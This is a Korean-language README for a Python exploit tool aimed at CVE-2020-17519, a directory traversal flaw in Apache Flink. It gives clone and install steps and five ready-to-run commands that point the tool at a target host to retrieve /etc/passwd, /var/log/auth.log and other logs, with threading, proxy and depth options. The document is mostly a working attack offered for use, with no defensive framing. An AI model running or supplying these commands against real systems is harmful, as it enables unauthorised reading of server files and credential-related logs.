
Python 기반 디렉토리 탐색 취약점 익스플로잇 (CVE-2020-17519, Apache Flink) - 멀티스레딩, 프록시 지원, 취약한 대상에서 로그 파일을 검색하기 위한 구성 가능한 깊이 제공.
타겟 URL에서 디렉토리 트래버설 기법을 사용하여 로그 파일을 요청하는 Python 도구입니다. 실시간 진행 상황을 표시하고, 프록시 구성을 지원하며, 유효한 응답을 선택적으로 저장합니다.
requests 및 pwntools (pwn)argparse, os, concurrent.futures, threadinggit clone https://github.com/GazettEl/CVE-2020-17519.git
pip install requests pwntools
이 도구는 다양한 옵션과 함께 명령줄에서 실행할 수 있습니다. 아래는 몇 가지 예시입니다:
예시 1: 단일 파일 경로 요청
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-path /var/log/syslog --threads 1 --save
예시 2: 목록에서 여러 파일 경로 요청
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-list file_paths.txt --threads 4 --proxy none
예시 3: 프록시 비활성화 실행
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 10 --file-path /var/log/auth.log --threads 2 --proxy none
예시 4: 파일 목록 사용 및 유효한 응답 저장
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 15 --file-list paths.txt --threads 4 --save
예시 5: 깊이를 늘려 단일 파일 요청
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 20 --file-path /etc/passwd --threads 1
자세한 내용은 소스 코드 및 인라인 주석을 참조하세요.